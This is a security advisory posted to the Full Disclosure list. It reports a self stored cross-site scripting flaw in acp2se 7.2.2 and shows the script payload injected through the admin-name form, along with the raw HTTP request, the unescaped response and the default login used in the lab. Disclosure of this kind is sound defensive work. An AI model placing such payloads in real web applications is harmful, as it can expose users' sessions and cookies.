# Exploit Title: Self Stored XSS - acp2sev7.2.2 # Date: 02/2025 # Exploit Author: Andrey Stoykov # Version: 7.2.2 # Tested on: Ubuntu 22.04 # Blog: https://msecureltd.blogspot.com/2025/02/friday-fun-pentest-series-19-self.html
Self Stored XSS #1: Steps to Reproduce: 1. Visit "http://192.168.58.168/acp2se/mul/muladmin.php"; and login with "admin" / "adminpass" 2. In the field "Put the name of the new Admin" enter the following payload "><svg onload=prompt(document.cookie)> // HTTP POST request POST /acp2se/mul/muladmin.php HTTP/1.1 Host: 192.168.58.168 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 71 Origin: http://192.168.58.168 DNT: 1 Sec-GPC: 1 Connection: keep-alive Referer: http://192.168.58.168/acp2se/mul/muladmin.php Cookie: PHPSESSID=ofq25o83upb0tvch4759uo78f5 Upgrade-Insecure-Requests: 1 Priority: u=0, i name="><svg onload=prompt(document.cookie)>&submit=Submit // HTTP Response HTTP/1.1 200 OK Date: Wed, 19 Feb 2025 08:22:26 GMT Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3 X-Powered-By: PHP/5.6.40 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 1210 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 [...] <table border='1' cellpadding='2' cellspacing='2' width='850'> <tr bgcolor='#C0C0C0'> <th width='850'>You have added a default Admin. His name is: "><svg onload=prompt(document.cookie)> .</br> The default password will be: <b>Admin</b> [...] _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
